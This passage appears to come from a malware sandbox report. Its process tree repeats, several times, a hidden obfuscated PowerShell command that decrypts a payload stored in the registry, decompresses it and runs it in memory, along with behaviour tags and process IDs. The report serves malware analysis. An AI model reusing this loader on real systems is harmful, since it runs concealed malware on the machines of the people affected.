$JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1612
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2808
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:116
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4800
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 